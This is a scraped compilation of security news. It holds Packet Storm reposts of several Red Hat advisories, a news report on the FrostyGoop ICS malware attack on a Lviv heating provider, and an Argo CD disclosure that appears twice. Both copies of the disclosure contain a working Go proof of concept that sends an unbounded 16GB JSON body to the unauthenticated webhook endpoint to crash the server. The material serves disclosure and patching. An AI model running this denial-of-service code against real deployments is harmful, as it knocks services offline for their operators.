Red Hat Security Advisory 2024-4774-03 - An update for linux-firmware is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4774.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: linux-firmware security updateAdvisory ID:        RHSA-2024:4774-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4774Issue date:         2024-07-23Revision:           03CVE Names:          CVE-2023-31346====================================================================Summary: An update for linux-firmware is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The linux-firmware packages contain all of the firmware files that are required by various devices to operate.Security Fix(es):* kernel: Reserved fields in guest message responses may not be zero initialized (CVE-2023-31346)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-31346References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2250458

Red Hat Security Advisory 2024-4774-03

Red Hat Security Advisory 2024-4766-03 - An update for python3 is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4766.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: python3 security updateAdvisory ID:        RHSA-2024:4766-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4766Issue date:         2024-07-23Revision:           03CVE Names:          CVE-2024-4032====================================================================Summary: An update for python3 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4032References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2292921

Red Hat Security Advisory 2024-4766-03

Red Hat Security Advisory 2024-4762-03 - An update for runc is now available for Red Hat Enterprise Linux 9. Issues addressed include a memory leak vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4762.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: runc security updateAdvisory ID:        RHSA-2024:4762-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4762Issue date:         2024-07-23Revision:           03CVE Names:          CVE-2024-1394====================================================================Summary: An update for runc is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1394References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2262921

Red Hat Security Advisory 2024-4762-03

Red Hat Security Advisory 2024-4761-03 - An update for containernetworking-plugins is now available for Red Hat Enterprise Linux 9. Issues addressed include a memory leak vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4761.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: containernetworking-plugins security updateAdvisory ID:        RHSA-2024:4761-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4761Issue date:         2024-07-23Revision:           03CVE Names:          CVE-2024-1394====================================================================Summary: An update for containernetworking-plugins is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1394References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2262921

Red Hat Security Advisory 2024-4761-03

Red Hat Security Advisory 2024-4757-03 - An update for libvirt is now available for Red Hat Enterprise Linux 9. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4757.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libvirt security updateAdvisory ID:        RHSA-2024:4757-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4757Issue date:         2024-07-23Revision:           03CVE Names:          CVE-2024-4418====================================================================Summary: An update for libvirt is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) offers a full virtualization solution forLinux on numerous hardware platforms. The virt:rhel module contains packageswhich provide user-space components used to run virtual machines using KVM.The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix(es):* libvirt: stack use-after-free in virNetClientIOEventLoop() (CVE-2024-4418)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4418References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2278616

Red Hat Security Advisory 2024-4757-03

Red Hat Security Advisory 2024-4717-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4717.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: thunderbird security updateAdvisory ID:        RHSA-2024:4717-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4717Issue date:         2024-07-23Revision:           03CVE Names:          CVE-2024-6601====================================================================Summary: An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Thunderbird is a standalone mail and newsgroup client.Security Fix(es):* Mozilla: Race condition in permission assignment (CVE-2024-6601)* Mozilla: Memory corruption in NSS (CVE-2024-6602)* Mozilla: Memory corruption in thread creation (CVE-2024-6603)* Mozilla: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (CVE-2024-6604)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6601References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2296636https://bugzilla.redhat.com/show_bug.cgi?id=2296637https://bugzilla.redhat.com/show_bug.cgi?id=2296638https://bugzilla.redhat.com/show_bug.cgi?id=2296639

Red Hat Security Advisory 2024-4717-03

Red Hat Security Advisory 2024-4713-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 9. Issues addressed include code execution and use-after-free vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4713.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:4713-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4713Issue date:         2024-07-23Revision:           03CVE Names:          CVE-2024-36886====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-36886References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2277238

Red Hat Security Advisory 2024-4713-03

Red Hat Security Advisory 2024-4697-03 - An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4697.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat build of Cryostat security updateAdvisory ID:        RHSA-2024:4697-03Product:            CryostatAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4697Issue date:         2024-07-22Revision:           03CVE Names:          CVE-2024-24788====================================================================Summary: An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.Security Fix(es):* golang: net: malformed DNS message can cause infinite loop (CVE-2024-24788)* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-24788References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2279814https://bugzilla.redhat.com/show_bug.cgi?id=2292787

Red Hat Security Advisory 2024-4697-03

Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January.
Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP

ICS Malware / Critical Infrastructure

Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January.

Industrial cybersecurity firm Dragos has dubbed the malware **FrostyGoop**, describing it as the first malware strain to directly use Modbus TCP communications to sabotage operational technology (OT) networks. It was discovered by the company in April 2024.

"FrostyGoop is an ICS-specific malware written in Golang that can interact directly with Industrial Control Systems (ICS) using Modbus TCP over port 502," researchers Kyle O'Meara, Magpie (Mark) Graham, and Carolyn Ahlers said in a technical report shared with The Hacker News.

It's believed that the malware, mainly designed to target Windows systems, has been used to target ENCO controllers with TCP port 502 exposed to the internet. It has not been tied to any previously identified threat actor or activity cluster.

FrostyGoop comes with capabilities to read and write to an ICS device holding registers containing inputs, outputs, and configuration data. It also accepts optional command line execution arguments, uses JSON-formatted configuration files to specify target IP addresses and Modbus commands, and logs output to a console and/or a JSON file.

The incident targeting the municipal district energy company is said to have resulted in a loss of heating services to more than 600 apartment buildings for almost 48 hours.

"The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions," the researchers said in a conference call, noting initial access was likely gained by exploiting a vulnerability in Mikrotik routers in April 2023.

"The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions. Remediation took almost two days."

While FrostyGoop extensively employs the Modbus protocol for client/server communications, it's far from the only one. In 2022, Dragos and Mandiant detailed another ICS malware named PIPEDREAM (aka INCONTROLLER) that leveraged various industrial network protocols such as OPC UA, Modbus, and CODESYS for interaction.

It's also the ninth ICS-focused malware after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, and COSMICENERGY.

The malware's ability to read or modify data on ICS devices using Modbus has severe consequences for industrial operations and public safety, Dragos said, adding more than 46,000 internet-exposed ICS appliances communicate over the widely-used protocol.

"The specific targeting of ICS using Modbus TCP over port 502 and the potential to interact directly with various ICS devices pose a serious threat to critical infrastructure across multiple sectors," the researchers said.

"Organizations must prioritize the implementation of comprehensive cybersecurity frameworks to safeguard critical infrastructure from similar threats in the future."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New ICS Malware 'FrostyGoop' Targeting Critical Infrastructure

### Summary
This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.

### Details
The webhook server always listens to requests. By default, the endpoint doesn't require authentication. It's possible to send a large, malicious request with headers (in this case "X-GitHub-Event: push") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.

The fix would be to enforce a limit on the size of the request being parsed.

### PoC
Port-forward to the argocd-server service, like so:

```console
kubectl port-forward svc/argocd-server -n argocd 8080:443
```

Run the below code:

```go
package main

import (
	"crypto/tls"
	"io"
	"net/http"
)

// Define a custom io.Reader that generates a large dummy JSON payload.
type DummyJSONReader struct {
	size int64 // Total size to generate
	read int64 // Bytes already generated
}

// Read generates the next chunk of the dummy JSON payload.
func (r *DummyJSONReader) Read(p []byte) (n int, err error) {
	if r.read >= r.size {
		return 0, io.EOF // Finished generating
	}

	start := false
	if r.read == 0 {
		// Start of JSON
		p[0] = '{'
		p[1] = '"'
		p[2] = 'd'
		p[3] = 'a'
		p[4] = 't'
		p[5] = 'a'
		p[6] = '"'
		p[7] = ':'
		p[8] = '"'
		n = 9
		start = true
	}

	for i := n; i < len(p); i++ {
		if r.read+int64(i)-int64(n)+1 == r.size-1 {
			// End of JSON
			p[i] = '"'
			p[i+1] = '}'
			r.read += int64(i) + 2 - int64(n)
			return i + 2 - n, nil
		} else {
			p[i] = 'x' // Dummy data
		}
	}

	r.read += int64(len(p)) - int64(n)
	if start {
		return len(p), nil
	}
	return len(p) - n, nil
}

func main() {
	// Initialize the custom reader with the desired size (16GB in this case).
	payloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB
	reader := &DummyJSONReader{size: payloadSize}

	// HTTP client setup
	httpClient := &http.Client{
		Timeout: 0, // No timeout
		Transport: &http.Transport{
			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
		},
	}

	req, err := http.NewRequest("POST", "https://localhost:8080/api/webhook", reader)
	if err != nil {
		panic(err)
	}

	// Set headers
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("X-GitHub-Event", "push")

	resp, err := httpClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	println("Response status code:", resp.StatusCode)
}
```

### Patches
A patch for this vulnerability has been released in the following Argo CD versions:

v2.11.6
v2.10.15
v2.9.20

### For more information
If you have any questions or comments about this advisory:

Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)
Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd

### Credits
This vulnerability was found & reported by Jakub Ciolek

The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue


**Summary**

This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.

**Details**

The webhook server always listens to requests. By default, the endpoint doesn't require authentication. It's possible to send a large, malicious request with headers (in this case "X-GitHub-Event: push") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.

The fix would be to enforce a limit on the size of the request being parsed.

**PoC**

Port-forward to the argocd-server service, like so:

kubectl port-forward svc/argocd-server -n argocd 8080:443

Run the below code:

package main

import (
	"crypto/tls"
	"io"
	"net/http"
)

// Define a custom io.Reader that generates a large dummy JSON payload.
type DummyJSONReader struct {
	size int64 // Total size to generate
	read int64 // Bytes already generated
}

// Read generates the next chunk of the dummy JSON payload.
func (r \*DummyJSONReader) Read(p \[\]byte) (n int, err error) {
	if r.read \>= r.size {
		return 0, io.EOF // Finished generating
	}

	start := false
	if r.read \== 0 {
		// Start of JSON
		p\[0\] \= '{'
		p\[1\] \= '"'
		p\[2\] \= 'd'
		p\[3\] \= 'a'
		p\[4\] \= 't'
		p\[5\] \= 'a'
		p\[6\] \= '"'
		p\[7\] \= ':'
		p\[8\] \= '"'
		n \= 9
		start \= true
	}

	for i := n; i < len(p); i++ {
		if r.read+int64(i)\-int64(n)+1 \== r.size\-1 {
			// End of JSON
			p\[i\] \= '"'
			p\[i+1\] \= '}'
			r.read += int64(i) + 2 \- int64(n)
			return i + 2 \- n, nil
		} else {
			p\[i\] \= 'x' // Dummy data
		}
	}

	r.read += int64(len(p)) \- int64(n)
	if start {
		return len(p), nil
	}
	return len(p) \- n, nil
}

func main() {
	// Initialize the custom reader with the desired size (16GB in this case).
	payloadSize := int64(16) \* 1024 \* 1024 \* 1024 // 16GB
	reader := &DummyJSONReader{size: payloadSize}

	// HTTP client setup
	httpClient := &http.Client{
		Timeout: 0, // No timeout
		Transport: &http.Transport{
			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
		},
	}

	req, err := http.NewRequest("POST", "https://localhost:8080/api/webhook", reader)
	if err != nil {
		panic(err)
	}

	// Set headers
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("X-GitHub-Event", "push")

	resp, err := httpClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	println("Response status code:", resp.StatusCode)
}

**Patches**

A patch for this vulnerability has been released in the following Argo CD versions:

v2.11.6  
v2.10.15  
v2.9.20

**For more information**

If you have any questions or comments about this advisory:

Open an issue in the Argo CD issue tracker or discussions  
Join us on Slack in channel #argo-cd

**Credits**

This vulnerability was found & reported by Jakub Ciolek

The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue

**References**

*   GHSA-jmvp-698c-4x3w
*   argoproj/argo-cd@46c0c0b
*   argoproj/argo-cd@540e3a5
*   argoproj/argo-cd@d881ee7

Tag

#js